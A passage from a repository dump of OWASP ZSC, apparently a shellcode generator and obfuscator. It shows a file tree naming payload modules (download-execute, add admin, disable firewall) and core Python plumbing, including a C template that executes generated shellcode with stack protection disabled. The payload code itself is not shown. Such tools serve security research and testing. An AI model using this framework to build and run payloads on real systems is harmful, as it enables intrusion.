├── .github └── FUNDING.yml ├── .gitignore ├── CHANGELOG.md ├── LICENSE.md ├── core ├── __init__.py ├── alert.py ├── cli.py ├── color.py ├── commands.py ├── compatible.py ├── controller.py ├── encode.py ├── file_out.py ├── get_input.py ├── obfuscate.py ├── opcoder.py ├── run.py ├── stack.py ├── start.py └── update.py ├── doc ├── README.md ├── owasp-zsc.epub ├── owasp-zsc.mobi └── owasp-zsc.pdf ├── installer.py ├── lib ├── __init__.py ├── encoder │ ├── __init__.py │ ├── javascript │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── jsfuck.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_base64_rev.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── linux_x86 │ │ ├── __init__.py │ │ ├── add_random.py │ │ ├── add_yourvalue.py │ │ ├── dec.py │ │ ├── dec_timesyouwant.py │ │ ├── inc.py │ │ ├── inc_timesyouwant.py │ │ ├── mix_all.py │ │ ├── sub_random.py │ │ ├── sub_yourvalue.py │ │ ├── xor_random.py │ │ └── xor_yourvalue.py │ ├── osx_x86 │ │ ├── __init__.py │ │ ├── add_random.py │ │ ├── add_yourvalue.py │ │ ├── dec.py │ │ ├── dec_timesyouwant.py │ │ ├── inc.py │ │ ├── inc_timesyouwant.py │ │ ├── sub_random.py │ │ ├── sub_yourvalue.py │ │ ├── xor_random.py │ │ └── xor_yourvalue.py │ ├── perl │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── simple_ascii.py │ │ ├── simple_base64_rev.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── php │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── base64_rev.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── python │ │ ├── __init__.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_base64_rev.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ ├── ruby │ │ ├── __init__.py │ │ ├── base64.py │ │ ├── base64_rev.py │ │ ├── rot13.py │ │ ├── simple_ascii.py │ │ ├── simple_hex.py │ │ └── simple_hex_rev.py │ └── windows_x86 │ │ ├── __init__.py │ │ ├── add_random.py │ │ ├── add_yourvalue.py │ │ ├── dec.py │ │ ├── dec_timesyouwant.py │ │ ├── inc.py │ │ ├── inc_timesyouwant.py │ │ ├── sub_random.py │ │ ├── sub_yourvalue.py │ │ ├── xor_random.py │ │ └── xor_yourvalue.py ├── generator │ ├── __init__.py │ ├── linux_x86 │ │ ├── __init__.py │ │ ├── chmod.py │ │ ├── dir_create.py │ │ ├── download.py │ │ ├── download_execute.py │ │ ├── exec.py │ │ ├── file_create.py │ │ ├── script_executor.py │ │ ├── system.py │ │ └── write.py │ ├── osx_x86 │ │ ├── __init__.py │ │ ├── chmod.py │ │ ├── exec.py │ │ └── system.py │ ├── windows_x86 │ │ ├── __init__.py │ │ ├── add_admin.py │ │ ├── create_file.py │ │ ├── dir_create.py │ │ ├── disable_firewall.py │ │ ├── download_exec.py │ │ ├── download_tofile.py │ │ └── exec.py │ └── windows_x86_64 │ │ ├── __init__.py │ │ ├── exec-intel.py │ │ └── exec.py ├── opcoder │ ├── __init__.py │ ├── linux_x86.py │ ├── osx_x86.py │ ├── windows_x86.py │ └── windows_x86_64.py └── shell_storm_api │ ├── __init__.py │ └── grab.py ├── module ├── __init__.py ├── readline_osx │ ├── README.md │ ├── readline.py │ └── readline.so └── readline_windows │ ├── README.md │ ├── __init__.py │ ├── pyreadline │ ├── __init__.py │ ├── clipboard │ │ ├── __init__.py │ │ ├── ironpython_clipboard.py │ │ ├── no_clipboard.py │ │ └── win32_clipboard.py │ ├── configuration │ │ ├── pyreadlineconfig.ini │ │ └── startup.py │ ├── console │ │ ├── __init__.py │ │ ├── ansi.py │ │ ├── console.py │ │ ├── console_attributes.py │ │ ├── consolebase.py │ │ ├── event.py │ │ └── ironpython_console.py │ ├── error.py │ ├── get_doc.py │ ├── keysyms │ │ ├── __init__.py │ │ ├── common.py │ │ ├── ironpython_keysyms.py │ │ ├── keysyms.py │ │ └── winconstants.py │ ├── lineeditor │ │ ├── __init__.py │ │ ├── history.py │ │ ├── lineobj.py │ │ └── wordmatcher.py │ ├── logger.py │ ├── logserver.py │ ├── modes │ │ ├── __init__.py │ │ ├── basemode.py │ │ ├── emacs.py │ │ ├── notemacs.py │ │ └── vi.py │ ├── py3k_compat.py │ ├── release.py │ ├── rlmain.py │ ├── test │ │ ├── __init__.py │ │ ├── common.py │ │ ├── test_emacs.py │ │ ├── test_history.py │ │ ├── test_lineeditor.py │ │ └── test_vi.py │ └── unicode_helper.py │ └── readline.py ├── readme.md ├── uninstaller.py ├── version └── zsc.py /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: [zdresearch] 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled python files 2 | 3 | *.pyc 4 | 5 | #gdb history 6 | .gdb_history 7 | 8 | #pyCharm settings 9 | .idea/* 10 | 11 | #peda 12 | peda-session* 13 | 14 | #tmp files 15 | *.py~ -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /core/alert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import sys 10 | from core import color 11 | 12 | 13 | def info(content): 14 | if "\n" in content: 15 | num_newline = len(content) - len(content.rstrip("\n")) 16 | sys.stdout.write(color.color('yellow') + '[+] ' + color.color('green') + 17 | content[:-num_newline] + color.color('reset') + "\n"*num_newline) 18 | else: 19 | sys.stdout.write(color.color('yellow') + '[+] ' + color.color('green') + 20 | content + color.color('reset') + "\n") 21 | return 22 | 23 | 24 | def write(content): 25 | sys.stdout.write(content) 26 | return 27 | 28 | 29 | def warn(content): 30 | if "\n" in content: 31 | num_newline = len(content) - len(content.rstrip("\n")) 32 | sys.stdout.write(color.color('red') + '[!] ' + color.color('yellow') + 33 | content[:-num_newline] + color.color('reset') + "\n"*num_newline) 34 | else: 35 | sys.stdout.write(color.color('red') + '[!] ' + color.color('yellow') + 36 | content + color.color('reset') + "\n") 37 | return 38 | 39 | 40 | def error(content): 41 | sys.stdout.write(content) 42 | return 43 | -------------------------------------------------------------------------------- /core/color.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | #bug fix reported by John Babio in version 1.0.4 johndbabio/[at]/gmail/./com 10 | from core import compatible 11 | os_name = compatible.os_name() 12 | 13 | 14 | def color(color): 15 | if 'linux' in os_name or os_name == 'darwin': 16 | if color == 'reset': 17 | return '\033[0m' 18 | if color == 'grey': 19 | return '\033[1;30m' 20 | if color == 'red': 21 | return '\033[1;31m' 22 | if color == 'green': 23 | return '\033[1;32m' 24 | if color == 'yellow': 25 | return '\033[1;33m' 26 | if color == 'blue': 27 | return '\033[1;34m' 28 | if color == 'purple': 29 | return '\033[1;35m' 30 | if color == 'cyan': 31 | return '\033[1;36m' 32 | if color == 'white': 33 | return '\033[1;37m' 34 | else: 35 | return '' 36 | ''' Add in next versions! 37 | import ctypes 38 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(-11) 39 | handle=std_out_handle 40 | if color == 'reset': 41 | pass 42 | if color == 'grey': 43 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x07) 44 | if color == 'red': 45 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 12) 46 | if color == 'green': 47 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 10) 48 | if color == 'yellow': 49 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x06) 50 | if color == 'blue': 51 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x09) 52 | if color == 'purple': 53 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 13) 54 | if color == 'cyan': 55 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 11) 56 | if color == 'white': 57 | ctypes.windll.kernel32.SetConsoleTextAttribute(handle, 0x07) 58 | 59 | ''' 60 | -------------------------------------------------------------------------------- /core/compatible.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import sys 10 | import os 11 | 12 | 13 | def version(): 14 | return int(sys.version_info.major) 15 | 16 | 17 | def check(): 18 | if 'linux' in sys.platform or 'darwin' in sys.platform: 19 | os.system('clear') 20 | elif 'win32' == sys.platform or 'win64' == sys.platform: 21 | os.system('cls') 22 | else: 23 | sys.exit( 24 | 'Sorry, This version of software just could be run on linux/osx/windows.') 25 | if version() is 2 or version() is 3: 26 | pass 27 | else: 28 | sys.exit('Your python version is not supported!') 29 | return 30 | 31 | 32 | def os_name(): 33 | return sys.platform 34 | -------------------------------------------------------------------------------- /core/controller.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import run 10 | from core.cli import _cli_start 11 | import sys 12 | import os 13 | 14 | exec (compile( 15 | open( 16 | str(os.path.dirname(os.path.abspath(__file__)).replace('\\', '/')) + 17 | '/commands.py', "rb").read(), str(os.path.dirname(os.path.abspath( 18 | __file__)).replace('\\', '/')) + '/commands.py', 'exec')) 19 | 20 | 21 | def _interface(): 22 | if len(sys.argv) is 1: 23 | run.engine(commands) #run engine with user friendly interface 24 | else: 25 | _cli_start(commands) #run engine with basic interface 26 | -------------------------------------------------------------------------------- /core/file_out.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core.alert import * 10 | 11 | 12 | def file_output(target, func, data, os, encode, shellcode, shellcode_op): 13 | args = "" 14 | if data == '': 15 | args = "'True'" 16 | else: 17 | for value in data: 18 | if value != '': 19 | args += "'" + value + "'," 20 | args = args[:-1] 21 | fileout = open(target, 'w') 22 | file_output = '''#include 23 | #include 24 | /* 25 | This shellcode generated by OWASP ZSC 26 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 27 | http://zsc.z3r0d4y.com/ 28 | owasp-zsc[at]googlegroups[dot]com 29 | 30 | Title: %s(%s) 31 | OS: %s 32 | Encode: %s 33 | Length: %s 34 | Assembly code:\n 35 | %s 36 | 37 | 38 | 39 | compile example(osx_x86): gcc -m32 -o shellcode_compiled %s 40 | compile example(linux_x86): gcc -m32 -z execstack -o shellcode_compiled %s 41 | compile example(windows_x86): gcc -o shellcode_compiled.exe %s 42 | followed by(to run): ./shellcode_compiled or shellcode_compiled.exe 43 | */ 44 | \n\n 45 | char *shellcode = "%s"; 46 | int main(void) 47 | { 48 | (*(void(*)()) shellcode)(); 49 | return 0; 50 | } 51 | ''' % (func, args, os, encode, str(len(shellcode_op) / 4), shellcode, target, 52 | target, target, shellcode_op) 53 | fileout.write(file_output) 54 | fileout.close() 55 | info('File saved as %s .\n' % target) 56 | 57 | 58 | def downloaded_file_output(target, data): 59 | fileout = open(target, 'w') 60 | fileout.write(data) 61 | fileout.close() 62 | info('File saved as %s . \n' % target) 63 | -------------------------------------------------------------------------------- /core/get_input.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core.compatible import * 10 | from core.alert import * 11 | import binascii 12 | 13 | 14 | def _input(name, type, _while): 15 | data = None 16 | if _while is True: 17 | if type == 'any': 18 | while _while: 19 | try: 20 | if version() is 3: 21 | data = input('%s%s>%s ' % (color.color('blue'), name, 22 | color.color('yellow'))) 23 | if version() is 2: 24 | data = raw_input('%s%s>%s ' % ( 25 | color.color('blue'), name, color.color('yellow'))) 26 | if data == '': 27 | warn('input can\'t be empty! ') 28 | _lets_error 29 | break 30 | except: 31 | write('wrong input!\n') 32 | pass 33 | if type == 'hex': 34 | while _while: 35 | try: 36 | if version() is 3: 37 | data = input('%s%s>%s ' % (color.color('blue'), name, 38 | color.color('yellow'))) 39 | binascii.b2a_hex(data[::-1].encode('latin-1')).decode( 40 | 'latin-1') 41 | if version() is 2: 42 | data = raw_input('%s%s>%s ' % ( 43 | color.color('blue'), name, color.color('yellow'))) 44 | binascii.a2b_hex(data) 45 | if data == '': 46 | warn('input can\'t be empty! ') 47 | _lets_error 48 | break 49 | except: 50 | warn('you must enter a hex value\n') 51 | pass 52 | if type == 'int': 53 | while _while: 54 | try: 55 | if version() is 3: 56 | data = input('%s%s>%s ' % (color.color('blue'), name, 57 | color.color('yellow'))) 58 | if version() is 2: 59 | data = raw_input('%s%s>%s ' % ( 60 | color.color('blue'), name, color.color('yellow'))) 61 | int(data) #if empty, jump to exception and error! 62 | break 63 | except: 64 | warn('you must enter a int value\n') 65 | pass 66 | elif _while is False: 67 | if type == 'any': 68 | try: 69 | if version() is 3: 70 | data = input('%s%s>%s ' % (color.color('blue'), name, 71 | color.color('yellow'))) 72 | if version() is 2: 73 | data = raw_input('%s%s>%s ' % (color.color('blue'), name, 74 | color.color('yellow'))) 75 | except: 76 | write('wrong input!\n') 77 | pass 78 | if type == 'hex': 79 | try: 80 | if version() is 3: 81 | data = input('%s%s>%s ' % (color.color('blue'), name, 82 | color.color('yellow'))) 83 | binascii.b2a_hex(data[::-1].encode('latin-1')).decode( 84 | 'latin-1') 85 | if version() is 2: 86 | data = raw_input('%s%s>%s ' % (color.color('blue'), name, 87 | color.color('yellow'))) 88 | binascii.a2b_hex(data) 89 | except: 90 | warn('you must enter a hex value\n') 91 | pass 92 | if type == 'int': 93 | try: 94 | if version() is 3: 95 | data = input('%s%s>%s ' % (color.color('blue'), name, 96 | color.color('yellow'))) 97 | int(data) 98 | if version() is 2: 99 | data = raw_input('%s%s>%s ' % (color.color('blue'), name, 100 | color.color('yellow'))) 101 | int(data) 102 | except: 103 | warn('you must enter a int value\n') 104 | pass 105 | return data 106 | -------------------------------------------------------------------------------- /core/obfuscate.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core.alert import * 10 | from core.compatible import version 11 | 12 | 13 | def obf_code(lang, encode, filename, content,cli): 14 | if version() is 3: 15 | content = content.decode('utf-8') 16 | start = getattr( 17 | __import__('lib.encoder.%s.%s' % (lang, encode), 18 | fromlist=['start']), 19 | 'start') #import endoing module 20 | content = start(content,cli) #encoded content as returned value 21 | if version() is 3: 22 | content = bytes(content, 'utf-8') 23 | f = open(filename, 'wb') #writing content 24 | f.write(content) 25 | f.close() 26 | info('file "%s" encoded successfully!\n' % filename) 27 | return 28 | -------------------------------------------------------------------------------- /core/opcoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def op(shellcode, os): 12 | if os == 'linux_x86': #for linux_x86 os 13 | from lib.opcoder.linux_x86 import convert 14 | return convert(shellcode) 15 | if os == 'windows_x86': #for windows os 16 | from lib.opcoder.windows_x86 import convert 17 | return convert(shellcode) 18 | if os == 'osx_x86': # for osx_x86 os 19 | from lib.opcoder.osx_x86 import convert 20 | return convert(shellcode) 21 | if os == 'windows_x86_64': 22 | from lib.opcoder.windows_x86_64 import convert 23 | #add os opcoder here 24 | return shellcode 25 | -------------------------------------------------------------------------------- /core/start.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import sys 10 | #from core import update as upd 11 | from core.compatible import version 12 | __version__ = '1.1.0' 13 | __key__ = 'ST' 14 | __release_date__ = '2016 July 22' 15 | from core import color 16 | 17 | 18 | def logo(): 19 | print(color.color('red') + ''' 20 | ______ __ _____ _____ ______ _____ _____ 21 | / __ \ \ / /\ / ____| __ \ |___ // ____|/ ____| 22 | | | | \ \ /\ / / \ | (___ | |__) | / /| (___ | | 23 | | | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| | 24 | | |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____ 25 | \____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____| 26 | 27 | 28 | ''' + color.color('cyan') + '\t\t' + color.color( 29 | 'green') + 'OWASP' + color.color('cyan') + 30 | ' ZeroDay Cyber Research Shellcoder\n' + color.color('reset')) 31 | 32 | 33 | def sig(): 34 | print('''%s 35 | |----------------------------------------------------------------------------| 36 | |%sVisit%s https://www.%sowasp%s.org/index.php/OWASP_ZSC_Tool_Project ---------------| 37 | |----------------------------------------------------------------------------|%s''' 38 | % (color.color('blue'), color.color('red'), color.color('blue'), 39 | color.color('red'), color.color('blue'), color.color('reset'))) 40 | 41 | 42 | def inputcheck(): 43 | print(color.color('yellow') + ''' 44 | [+] Wrong input, Check Help Menu ,Execute: zsc ''' + color.color('red') + '-h' 45 | + '\n' + color.color('reset')) 46 | sys.exit(sig()) 47 | 48 | 49 | def about(): 50 | write('\n') 51 | info = [ 52 | ['Code', 'https://github.com/Ali-Razmjoo/OWASP-ZSC'], [ 53 | 'Contributors', 54 | 'https://github.com/Ali-Razmjoo/OWASP-ZSC/graphs/contributors' 55 | ], ['API', 'http://api.z3r0d4y.com/'], 56 | ['Home', 'http://zsc.z3r0d4y.com/'], 57 | ['Mailing List', 58 | 'https://groups.google.com/d/forum/owasp-zsc'], 59 | ['Contact US Now', 'owasp-zsc[at]googlegroups[dot]com'] 60 | ] 61 | for section in info: 62 | write('%s%s%s: %s%s%s\n' % 63 | (color.color('red'), section[0], color.color('reset'), 64 | color.color('yellow'), section[1], color.color('reset'))) 65 | sig() 66 | 67 | 68 | def _version(): 69 | write('\n') 70 | write('%sOWASP ZSC Version: %s%s\n' % 71 | (color.color('cyan'), color.color('red'), __version__)) 72 | write('%sKey: %s%s\n' % (color.color('cyan'), color.color('red'), __key__)) 73 | write('%sRelease Date: %s%s\n' % 74 | (color.color('cyan'), color.color('red'), __release_date__)) 75 | sig() 76 | -------------------------------------------------------------------------------- /core/update.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core.compatible import * 10 | from core.alert import * 11 | from core import color 12 | if version() is 2: 13 | from urllib import urlopen 14 | if version() is 3: 15 | from urllib.request import urlopen 16 | 17 | 18 | def _update(__version__): 19 | url = 'https://raw.githubusercontent.com/zdresearch/ZCR-Shellcoder-Archive/master/last_version' 20 | up_url = 'https://raw.githubusercontent.com/zdresearch/ZCR-Shellcoder-Archive/master/' 21 | err = 0 22 | try: 23 | last_version = urlopen(url).read() 24 | last_version = last_version.rsplit()[0] 25 | except: 26 | write('%sConnection Error!%s\n\n' % 27 | (color.color('red'), color.color('reset'))) 28 | err = 1 29 | if err is 0: 30 | update = True 31 | if str(last_version) == str(__version__): 32 | write('%syou are using the last version of software : %s%s%s\n' % 33 | (color.color('green'), color.color('red'), last_version, 34 | color.color('reset'))) 35 | update = False 36 | if update is True: 37 | write( 38 | '%syour software version: %s%s%s\nlast version released: %s%s%s\n\nDownloading %szcr_shellcoder_%s%s%s.zip%s\n\n\n' 39 | % (color.color('green'), color.color('cyan'), str(__version__), 40 | color.color('green'), color.color('red'), str(last_version), 41 | color.color('green'), color.color('yellow'), 42 | color.color('red'), str(last_version), 43 | color.color('yellow'), color.color('reset'))) 44 | up_url = up_url + 'zcr_shellcoder_%s.zip' % (last_version) 45 | try: 46 | file_name = up_url.split('/')[-1] 47 | u = urlopen(up_url) 48 | f = open(file_name, 'wb') 49 | meta = u.info() 50 | file_size = int(meta.getheaders("Content-Length")[0]) 51 | write("%sDownloading: %s%s%s Bytes: %s%s%s\n" % 52 | (color.color('white'), color.color('yellow'), file_name, 53 | color.color('white'), color.color('red'), file_size, 54 | color.color('blue'))) 55 | file_size_dl = 0 56 | block_sz = 10 57 | while True: 58 | buffer = u.read(block_sz) 59 | if not buffer: 60 | break 61 | file_size_dl += len(buffer) 62 | f.write(buffer) 63 | status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 64 | 100. / file_size) 65 | status = status + chr(8) * (len(status) + 1) 66 | print(status, ) 67 | f.close() 68 | write('%sFile Downloaded: %s%s%s\n\n' % 69 | (color.color('cyan'), color.color('yellow'), file_name, 70 | color.color('reset'))) 71 | except: 72 | write('%sConnection Error!%s\n\n' % 73 | (color.color('red'), color.color('reset'))) 74 | -------------------------------------------------------------------------------- /doc/README.md: -------------------------------------------------------------------------------- 1 | # OWASP ZSC Documentation 2 | The Latest version of these documents are available **[HERE](https://www.gitbook.com/book/ali-razmjoo/owasp-zsc/details)**. 3 | 4 | * [Read Online](https://ali-razmjoo.gitbooks.io/owasp-zsc/content/) 5 | * [PDF Version](https://www.gitbook.com/download/pdf/book/ali-razmjoo/owasp-zsc) 6 | * [ePub Version](https://www.gitbook.com/download/epub/book/ali-razmjoo/owasp-zsc) 7 | * [Mobi Version](https://www.gitbook.com/download/mobi/book/ali-razmjoo/owasp-zsc) 8 | 9 | There are some extra tricks on the blog which is located [HERE](http://zsc.z3r0d4y.com/blog/archives). -------------------------------------------------------------------------------- /doc/owasp-zsc.epub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/doc/owasp-zsc.epub -------------------------------------------------------------------------------- /doc/owasp-zsc.mobi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/doc/owasp-zsc.mobi -------------------------------------------------------------------------------- /doc/owasp-zsc.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/doc/owasp-zsc.pdf -------------------------------------------------------------------------------- /installer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import os 10 | import sys 11 | from core import start 12 | from core import color 13 | 14 | 15 | #start.logo() 16 | def check_prv(): 17 | try: 18 | if os.geteuid() is not 0: 19 | sys.exit(color.color('red') + 20 | 'Sorry, you most run this file as root.' + color.color( 21 | 'reset')) 22 | except AttributeError: 23 | import ctypes 24 | if ctypes.windll.shell32.IsUserAnAdmin() != 1: 25 | sys.exit(color.color('red') + 26 | 'Sorry, you most run this file as admin.' + color.color( 27 | 'reset')) 28 | 29 | 30 | def linux(): 31 | check_prv() 32 | executor = '''#!/bin/bash\npython /usr/share/owasp_zsc/zsc.py "$@"''' 33 | print(color.color('cyan') + 'Building Commandline') 34 | commandline = open('/usr/bin/zsc', 'w') 35 | commandline.write(executor) 36 | commandline.close() 37 | print(color.color('green') + 'Copying Files' + color.color('white')) 38 | os.system( 39 | 'rm -rf /usr/share/owasp_zsc && mkdir /usr/share/owasp_zsc && cp -r * /usr/share/owasp_zsc/ && chmod +x /usr/share/owasp_zsc/zsc.py && chmod +x /usr/bin/zsc') 40 | print( 41 | color.color('yellow') + 42 | '\nNow you can remove this folder\nfiles copied in /usr/share/owasp_zsc.\nto run zcr shellcoder please use "zsc" command line\n' 43 | + color.color('reset')) 44 | 45 | def osx(): 46 | check_prv() 47 | executor = '''#!/bin/bash\npython /usr/local/share/owasp_zsc/zsc.py "$@"''' 48 | print(color.color('cyan') + 'Building Commandline') 49 | commandline = open('/usr/local/bin/zsc', 'w') 50 | commandline.write(executor) 51 | commandline.close() 52 | print(color.color('green') + 'Copying Files' + color.color('white')) 53 | os.system( 54 | 'rm -rf /usr/local/share/owasp_zsc && mkdir /usr/local/share/owasp_zsc && cp -r * /usr/local/share/owasp_zsc/ && chmod +x /usr/local/share/owasp_zsc/zsc.py && chmod +x /usr/local/bin/zsc') 55 | print( 56 | color.color('yellow') + 57 | '\nNow you can remove this folder\nfiles copied in /usr/local/share/owasp_zsc.\nto run zcr shellcoder please use "zsc" command line\n' 58 | + color.color('reset')) 59 | 60 | def windows(): 61 | #check_prv() 62 | installing_path = str(sys.prefix) + str('\\Scripts\\zsc') 63 | try: 64 | os.mkdir(installing_path) 65 | except: 66 | pass 67 | print(color.color('green') + 'Copying Files' + color.color('white')) 68 | tmp_copy = os.popen('xcopy /y /s /i . %s' % installing_path).read() 69 | print(color.color('cyan') + 'Building Commandline') 70 | tmp_add_command_line = open('%s\\..\\zsc.bat' % installing_path, 'w') 71 | tmp_add_command_line.write('@echo off\npython %s\\zsc.py %%*' % 72 | installing_path) 73 | tmp_add_command_line.close() 74 | print( 75 | color.color('yellow') + 76 | '\nNow you can remove this folder\nfiles copied in %s.\nto run zcr shellcoder please use "zsc" command line\nNOTE: IF COMMAND LINE "zsc" NOT FOUND, PLEASE RE-OPEN YOUR CMD!\n' 77 | % installing_path + color.color('reset')) 78 | 79 | 80 | if 'linux' in sys.platform: 81 | os.system('clear') 82 | linux() 83 | elif 'darwin' in sys.platform: 84 | os.system('clear') 85 | osx() 86 | elif 'win32' in sys.platform or 'win64' in sys.platform: 87 | os.system('cls') 88 | windows() 89 | else: 90 | sys.exit( 91 | color.color('red') + 92 | 'OWASP ZSC currently supports install on windows/linux/osx only, for other platforms please copy source files to a directory and run' 93 | + color.color('reset')) 94 | start.sig() 95 | -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/javascript/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/javascript/base64.py: -------------------------------------------------------------------------------- 1 | 